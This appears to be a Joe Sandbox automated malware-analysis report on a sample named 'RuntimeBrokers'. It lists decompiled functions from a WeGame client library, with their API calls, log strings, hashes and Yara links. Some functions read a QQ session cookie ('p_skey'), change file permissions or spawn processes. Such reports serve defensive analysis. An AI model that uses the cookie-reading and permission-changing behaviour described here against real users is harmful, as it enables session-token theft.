                                        Function 6C0EAE66 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 257fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0EAE85
                                        • CreateFileA.KERNEL32(?,40000000,00000000,?,00000003,00000080,000000FF), ref: 6C0EAED4
                                        • GetCurrentProcess.KERNEL32 ref: 6C0EAEE9
                                        • GetCurrentProcess.KERNEL32 ref: 6C0EAEF4
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002), ref: 6C0EAF07
                                        • GetCurrentProcess.KERNEL32 ref: 6C0EAF11
                                        • GetCurrentProcess.KERNEL32 ref: 6C0EAF1C
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002), ref: 6C0EAF2F
                                        • memset.VCRUNTIME140(?,00000000,00000044), ref: 6C0EAF44
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(00000003,?,?,?,?,?,?,?,0000000F,?,00000000,00000044), ref: 6C0EAFD9
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,00000003,?,?,?,?,?,?,?,0000000F,?,00000000,00000044), ref: 6C0EAFE6
                                        Strings
                                        • [exception_track]ChildProcess CreateProcessW, exec:%s,args_:%s, xrefs: 6C0EB07F
                                        • d:\ci_dev\wegame_client\codes\common\src\child_process.cpp, xrefs: 6C0EB057, 6C0EB119
                                        • [exception_track]ChildProcess CreateProcessW fail, exec:%s,args_:%s, error:%d, xrefs: 6C0EB140
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@DuplicateHandleU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@$CreateFileH_prolog3_memset
                                        • String ID: [exception_track]ChildProcess CreateProcessW fail, exec:%s,args_:%s, error:%d$[exception_track]ChildProcess CreateProcessW, exec:%s,args_:%s$d:\ci_dev\wegame_client\codes\common\src\child_process.cpp
                                        • API String ID: 3476372949-726642795
                                        • Opcode ID: 1ac949e8aaeed9311843066ed051dbb449958ef4cceabe763b80c1e92d610560
                                        • Instruction ID: f389fde77476ab35dbfeca0b17f84191b6eb5ee188f11132fbe43e656be65cdd
                                        • Opcode Fuzzy Hash: 1ac949e8aaeed9311843066ed051dbb449958ef4cceabe763b80c1e92d610560
                                        • Instruction Fuzzy Hash: 7AA16B70901248EFDB24CFA4CC44BDDBBF8AF09304F608199E509B7291EB71AA49CF61
                                        Function 6C16F87A Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 330COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C16F884
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000138), ref: 6C16F899
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 6C16F936
                                        • ?ExtractFilePathAndNameW@silence_update@common@ierd_tgp@@KAHPB_WAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@1@Z.COMMON(?,?,?,?,?), ref: 6C16F99D
                                        • ?RemovePathSlashW@silence_update@common@ierd_tgp@@KAHAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?), ref: 6C16F9A9
                                        • ?ExtractFilePathAndNameW@silence_update@common@ierd_tgp@@KAHPB_WAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@1@Z.COMMON(?,?,?,?,?,?,?,?,?), ref: 6C16FA07
                                        • ?RemovePathSlashW@silence_update@common@ierd_tgp@@KAHAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,?), ref: 6C16FA10
                                        • ?ExtractFilePathAndNameW@silence_update@common@ierd_tgp@@KAHPB_WAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@1@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16FA67
                                        • ?RemovePathSlashW@silence_update@common@ierd_tgp@@KAHAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16FA70
                                        • ?ExtractFilePathAndNameW@silence_update@common@ierd_tgp@@KAHPB_WAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@1@Z.COMMON(?,?,?), ref: 6C16FAE1
                                        • ?RemovePathSlashW@silence_update@common@ierd_tgp@@KAHAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?), ref: 6C16FAEA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?), ref: 6C16FC7C
                                        • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,client_ui,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16FA95
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?), ref: 6C16FD54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$PathW@silence_update@common@ierd_tgp@@$ExtractFileNameRemoveSlashW@2@@std@@1@W@2@@std@@@$?get_log_instance@base@@Logger@1@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@H_prolog3H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@Xbad_function_call@std@@_wcsicmp
                                        • String ID: client_ui$d:\ci_dev\wegame_client\codes\common\src\util_silence_update.cpp$silence_update del done:%s$silence_update del:%s$version.ini
                                        • API String ID: 2402599457-2681532218
                                        • Opcode ID: 71b681ea20f6451055ca05eae2e4b233c132dbb0bbb36738fc63a5b00da495bb
                                        • Instruction ID: 5738a898e7cd901e7c757a9065acb1af0755e895a27b18fb3eeb8a5cb4ff32be
                                        • Opcode Fuzzy Hash: 71b681ea20f6451055ca05eae2e4b233c132dbb0bbb36738fc63a5b00da495bb
                                        • Instruction Fuzzy Hash: BBE124B0C01258DEDF24CFA9C844BDDFBB8AF64308F10419AD119B76A0DB756A89CF61
                                        Function 6C1EB890 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 194COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB8E2
                                        • __allrem.LIBCMT ref: 6C1EB919
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB927
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB937
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB96F
                                        • __allrem.LIBCMT ref: 6C1EB9A3
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB9B1
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB9C1
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EB9F8
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EBA2F
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1EBA58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
                                        • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                        • API String ID: 632788072-2102732564
                                        • Opcode ID: 9e249325ea55c7b9806d4926bbe234a32fb086ec808791bbaa4e4ea71a8c0bcc
                                        • Instruction ID: e28a47d5427aaaf4e7fa024dadbd1ac1de82b5971ed7de67bf679de8a9919a20
                                        • Opcode Fuzzy Hash: 9e249325ea55c7b9806d4926bbe234a32fb086ec808791bbaa4e4ea71a8c0bcc
                                        • Instruction Fuzzy Hash: 6841AFB2B45B603AE42169496C01FEF22298BD9F59F160469FB01F7F84C7586D0A42FF
                                        Function 6C0FA6CA Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 375COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FA6D4
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FA701
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FA891
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FAA09
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FA9BF
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                          • Part of subcall function 6C0AA3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0B62D8,00000000,6C0B6649,00000003,B33B76E5,?,?,00000000,6C316604,000000FF,?,6C0B5B05,00000000), ref: 6C0AA3E5
                                        • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 6C0FAB3F
                                        • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(00000000,00000001,?,?,?,?,?), ref: 6C0FAB77
                                        • ?get_qq_skey_value@CurlWrapper@curl_wrapper@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV45@_N@Z.COMMON(?,?,00000000,00000000,00000001,?,?,?,?,?), ref: 6C0FABB0
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp, xrefs: 6C0FA722, 6C0FA8B6, 6C0FA9E8, 6C0FAA32, 6C0FAA7C, 6C0FAADC
                                        • [curl_wrapper]get_qq_skey_value, init curl failed, xrefs: 6C0FAAF3
                                        • [curl_wrapper]get_qq_skey_value, curl perform failed:%d, xrefs: 6C0FAA9A
                                        • [curl_wrapper]get_qq_skey_value., xrefs: 6C0FA73C
                                        • [curl_wrapper]get_qq_skey_value, cookie is empty, xrefs: 6C0FA9FF
                                        • [curl_wrapper]get_qq_skey_value, get cookie info failed, xrefs: 6C0FAA49
                                        • [curl_wrapper]get_qq_skey_value, cookie is [%s], xrefs: 6C0FA8D4
                                        • p_skey, xrefs: 6C0FA93D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?get_qq_skey_value@?report@CurlD@2@@std@@D@std@@H_prolog3H_prolog3_H_prolog3_catch_Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@U?$char_traits@V45@_V?$allocator@V?$basic_string@Wrapper@curl_wrapper@ierd_tgp@@_invalid_parameter_noinfo_noreturn
                                        • String ID: [curl_wrapper]get_qq_skey_value, cookie is [%s]$[curl_wrapper]get_qq_skey_value, cookie is empty$[curl_wrapper]get_qq_skey_value, curl perform failed:%d$[curl_wrapper]get_qq_skey_value, get cookie info failed$[curl_wrapper]get_qq_skey_value, init curl failed$[curl_wrapper]get_qq_skey_value.$d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp$p_skey
                                        • API String ID: 4086295442-3566312541
                                        • Opcode ID: c69029cf46565d93491500e06df8e04c8b9f4de8f32e7cd575d14a7e24b544a8
                                        • Instruction ID: f0ffcae5a3b0f0a7abca295e37897e020b362b5d73c44d0be1f9379ad31a585e
                                        • Opcode Fuzzy Hash: c69029cf46565d93491500e06df8e04c8b9f4de8f32e7cd575d14a7e24b544a8
                                        • Instruction Fuzzy Hash: A4E16E70A01354AAEB11DBA4CC90FDE77F5AF15308F104098E554BB682DB75AE8ACF62
                                        Function 6C156389 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C156393
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6C1563CC
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?ModifyFileAccessTrustee@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0_N@Z.COMMON(?,?,00000001,Administrators), ref: 6C156415
                                          • Part of subcall function 6C153DD1: __EH_prolog3_GS.LIBCMT ref: 6C153DDB
                                          • Part of subcall function 6C153DD1: GetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00000080), ref: 6C153E11
                                          • Part of subcall function 6C153DD1: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000080), ref: 6C153E1D
                                          • Part of subcall function 6C153DD1: LocalFree.KERNEL32(00000000), ref: 6C153F7F
                                          • Part of subcall function 6C153DD1: LocalFree.KERNEL32(00000000), ref: 6C153F8A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C156434
                                        • ?ModifyFileAccessTrustee@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0_N@Z.COMMON(?,?,00000000), ref: 6C1564E7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,Users), ref: 6C156506
                                        • GetUserNameW.ADVAPI32(?,?), ref: 6C15658E
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6C156603
                                        • ?ModifyFileAccessTrustee@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0_N@Z.COMMON(?,?,00000000,?,?), ref: 6C15665E
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,Users), ref: 6C156681
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,Users), ref: 6C156707
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • Administrators, xrefs: 6C1563E7
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C156458, 6C15652A, 6C1566A5, 6C15672B
                                        • [E][Sys_wrapper]ModifyFileAccessTrustee, enable Administrators privilege failed: %s, xrefs: 6C156486
                                        • Users, xrefs: 6C1564B8
                                        • [E][Sys_wrapper]ModifyFileAccessTrustee, enable current user privilege failed: %s, %s, xrefs: 6C1566E8
                                        • [Sys_wrapper]SetFileAccessTrustee done, result: %d, current user: %s, path: %s, xrefs: 6C156772
                                        • [E][Sys_wrapper]ModifyFileAccessTrustee, enable Users privilege failed: %s, xrefs: 6C156558
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$AccessFileH_prolog3_ModifySys_wrapper@common@ierd_tgp@@Trustee@W@2@@std@@0_$?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@FreeLocalU?$char_traits@V?$allocator@V?$basic_string@W@2@@std@@$H_prolog3H_prolog3_catch_InfoNameNamedSecurityUser
                                        • String ID: Administrators$Users$[E][Sys_wrapper]ModifyFileAccessTrustee, enable Administrators privilege failed: %s$[E][Sys_wrapper]ModifyFileAccessTrustee, enable Users privilege failed: %s$[E][Sys_wrapper]ModifyFileAccessTrustee, enable current user privilege failed: %s, %s$[Sys_wrapper]SetFileAccessTrustee done, result: %d, current user: %s, path: %s$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 4202387323-622478044
                                        • Opcode ID: b053e05ea639d81b335677d60a87083a34f25d25122f71cda2baf7b1e968334b
                                        • Instruction ID: d9ddd3e37d9113b689f7039e65ac1e065d228c41ec596b1c77969a56014580d5
                                        • Opcode Fuzzy Hash: b053e05ea639d81b335677d60a87083a34f25d25122f71cda2baf7b1e968334b
                                        • Instruction Fuzzy Hash: B8B12870901228EEDB61DB68CD98BDDB7F4AB24304F6041D9D448B7681EB35AF88CF91
                                        Function 6C132903 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 209COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C13290D
                                        • memset.VCRUNTIME140(?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002), ref: 6C132923
                                        • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?), ref: 6C132933
                                        • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?), ref: 6C132941
                                        • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9), ref: 6C13294F
                                        • memset.VCRUNTIME140(?,00000000,00000400,?,?), ref: 6C132A82
                                          • Part of subcall function 6C0B04F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000,?,?,6C0BCB1C,?,?,%s,%lu,?,?,00000010), ref: 6C0B050C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C132AEB
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C132B46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3___stdio_common_vsprintf_s
                                        • String ID: [qos_t]InitQos failed, {}$[qos_t]InitQos success$d:\ci_dev\wegame_client\codes\common\src\qos_command.cpp$ied-tqos-tgp.qq.com$ied-tqos.qq.com$ied-tqos.wegamex.com.hk$ied-tqosweb.qq.com$ied-tqosweb.wegamex.com.hk$tqos.wegamex.com.hk
                                        • API String ID: 2915109889-1485585471
                                        • Opcode ID: 33d2f4c442b5a9bfbeebe1c4c7d458d0c43160aa5bd41663c1da2b67f73da811
                                        • Instruction ID: 2decde37918cfd8140e08b97657e467e8347451163b9c89fd7d3c6e4381159ba
                                        • Opcode Fuzzy Hash: 33d2f4c442b5a9bfbeebe1c4c7d458d0c43160aa5bd41663c1da2b67f73da811
                                        • Instruction Fuzzy Hash: C161DAB1A002197BDB14DF608D55FEA77ACAF4430CF004594A549A7A81DB35EE49CFE1
                                        Function 6C1326FD Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C132704
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F,===qos begin===,00000020,6C13625F,?,?,00000003,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?), ref: 6C13271C
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F), ref: 6C13272D
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?), ref: 6C132745
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F), ref: 6C13274E
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(00000000,6C345354), ref: 6C132778
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(0000000F), ref: 6C13278D
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F), ref: 6C13279A
                                        • memmove.VCRUNTIME140(?,0000000F,00000080,00000080,00000000), ref: 6C1327FB
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(00000000,6C345354), ref: 6C132816
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F), ref: 6C13283E
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0F5F3F), ref: 6C132878
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: V01@$D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@@$??6?$basic_ostream@$H_prolog3_memmove
                                        • String ID: ===qos begin===$===qos end===$Int$qos id = $str
                                        • API String ID: 3768889356-3919521203
                                        • Opcode ID: 4c46d7158eb2ec19e35eb1552f431fcc1cbfdaeda67621b9765563ce6ca45edc
